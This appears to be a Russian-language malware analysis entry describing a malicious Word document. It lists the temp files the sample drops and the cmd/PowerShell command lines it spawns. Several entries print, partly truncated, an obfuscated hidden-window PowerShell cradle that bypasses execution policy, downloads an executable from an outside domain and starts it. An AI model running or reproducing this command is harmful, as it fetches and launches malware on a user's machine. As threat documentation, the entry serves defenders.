Техническая информация
- '<SYSTEM32>\cmd.exe' /c "powErsHELl.ExE -ExecUtoNpoLIcy BYpAsS -noProFIle -wInDOwSTyLe hdDeN (nEW-oBjeCt sySTem.NET.WEBCLenT).dOWNLOadFLe('http://plusszemadamma.com/husya.exe','%aPPdAta%.ExE');sTaRT-...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\word\<Имя файла>.doc
- '<SYSTEM32>\cmd.exe' /c "powErsHELl.ExE -ExecUtoNpoLIcy BYpAsS -noProFIle -wInDOwSTyLe hdDeN (nEW-oBjeCt sySTem.NET.WEBCLenT).dOWNLOadFLe('http://plusszemadamma.com/husya.exe','%aPPdAta%.ExE');sTaRT-...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecUtoNpoLIcy BYpAsS -noProFIle -wInDOwSTyLe hdDeN (nEW-oBjeCt sySTem.NET.WEBCLenT).dOWNLOadFLe('http://plusszemadamma.com/husya.exe','%APPDATA%.ExE');sTaRT-PROCESS '%APPDATA%.eX...